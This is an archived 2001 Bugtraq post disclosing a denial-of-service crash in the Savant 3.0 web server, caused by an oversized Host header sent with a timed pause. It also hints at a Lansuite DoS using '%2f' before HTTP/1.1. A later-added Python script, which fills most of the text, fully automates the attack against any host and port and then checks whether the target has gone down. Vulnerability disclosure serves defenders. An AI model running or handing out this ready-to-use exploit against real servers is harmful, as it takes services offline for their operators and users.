[20055] in bugtraq
Savant 3.0 Denial Of Service
daemon@ATHENA.MIT.EDU (nitr0s@HOTMAIL.COM)
Fri Apr 6 04:53:54 2001
Message-ID: <20010405161316.2716.qmail@securityfocus.com>
Date: Thu, 5 Apr 2001 16:13:16 -0000
Reply-To: nitr0s@HOTMAIL.COM
From: nitr0s@HOTMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Not exactly sure what the problem is because it will
handle the same request from a program that does
the same thing.
"Time is a factor" so pay attention man ;P
Connect to the server using telnet or something and
type in the following:
GET / HTTP/1.1
Host:AAAAAAAAAAAAAAAAAAAA.....
Where A x 260, hit return, wait 3 seconds, hit return
again and you should see it crash. I tested this locally
and remotely on both Windows 98 and NT-4.
Oh yeah, no error messages are given on NT for
some reason, the program simply terminates, yes,
no more connections, got that? The following was
displayed on Windows 98. If you do not give it the
time, it doesn't work, got that okay?
So don't come saying "I threw so many characters at
it and nothing happened"; do as I say, and it will work.
SAVANT caused an invalid page fault in
module KERNEL32.DLL at 015f:bff87eb5.
Registers:
EAX=c00300f0 CS=015f EIP=bff87eb5
EFLGS=00010212
EBX=011bff88 SS=0167 ESP=010bffec
EBP=010c0058
ECX=10020c01 DS=0167 ESI=8163c414 FS=41af
EDX=bff76859 ES=0167 EDI=010c0238 GS=0000
Bytes at CS:EIP:
53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
Stack dump:
Sending the same request using a Perl script didn't
seem to affect the server at all, which is why I can't
tell what's wrong. But who cares? *shrug*
----------------------------------------------------------------
cut....
BTW Moderator, because you have been told that
maybe the Lansuite DoS against version 1.0.34
doesn't work, can I tell you that it is still effective
against the latest 1.0.35 and is effective locally as well
as remotely on both Windows 98 and NT-4, as I have
tested. I have Dr. Watson logs to prove it.
The trick in the problem is the forward slash before
HTTP/1.1, like %2fHTTP/1.1 - Get me sir?
So update your database please, people depend on
it, even the developers!!!
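The staged request the post describes, written up as an added example (this is not the poster's code, nor anything from Savant): it sends the request line and the 260-byte Host header, pauses, and only then sends the blank line that ends the header block, which is the timing the post says a one-shot script misses. The target host and port, the pause argument, the post-probe liveness check and the RecordingSocket dry-run stand-in are all assumptions made for illustration.

```python
import socket
import sys
import time

# Added example, not the original poster's code. Reproduces the two-step
# request from the post: "GET / HTTP/1.1" plus an oversized Host header, a
# pause, then the CRLF that terminates the headers. Host, port and the
# pause length are assumptions; the RecordingSocket exists only so the
# exchange can be exercised offline.


def build_request(host_len: int = 260, path: str = "/") -> bytes:
    """Request line and Host header only; the terminating empty line is sent later."""
    header = f"GET {path} HTTP/1.1\r\nHost:" + "A" * host_len + "\r\n"
    return header.encode("ascii")


def send_in_two_steps(sock, request: bytes, pause_seconds: float = 3.0) -> int:
    """Send the header block, wait, then send the CRLF that ends the headers.

    Returns the total number of bytes handed to the socket.
    """
    sock.sendall(request)
    time.sleep(pause_seconds)       # the post says this gap is what matters
    sock.sendall(b"\r\n")           # second "return": ends the header block
    return len(request) + 2


class RecordingSocket:
    """Stand-in socket for an offline dry run; records what would be sent."""

    def __init__(self):
        self.chunks = []

    def sendall(self, data: bytes) -> None:
        self.chunks.append(bytes(data))


def dry_run(host_len: int = 260) -> list:
    """Run the exchange against the recording stand-in with no pause."""
    fake = RecordingSocket()
    send_in_two_steps(fake, build_request(host_len), pause_seconds=0.0)
    return fake.chunks


def still_accepting(host: str, port: int, timeout: float = 5.0) -> bool:
    """After the probe, check whether the server still accepts a TCP connection."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def probe(host: str, port: int, pause_seconds: float = 3.0, host_len: int = 260) -> bool:
    """Send the staged request to a real target and report whether it survived."""
    with socket.create_connection((host, port), timeout=10.0) as sock:
        send_in_two_steps(sock, build_request(host_len), pause_seconds)
        sock.settimeout(5.0)
        try:
            sock.recv(4096)         # drain any reply; a dead server just closes
        except OSError:
            pass
    time.sleep(1.0)
    return still_accepting(host, port)


if __name__ == "__main__":
    target_host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"  # assumption
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80      # assumption
    if probe(target_host, target_port):
        print("server still accepting connections")
    else:
        print("server no longer accepting connections")
```

Run it as `python3 repro.py HOST PORT` only against a server you are permitted to test; `dry_run()` walks the same send path against the recording stand-in so the request bytes can be inspected without a target.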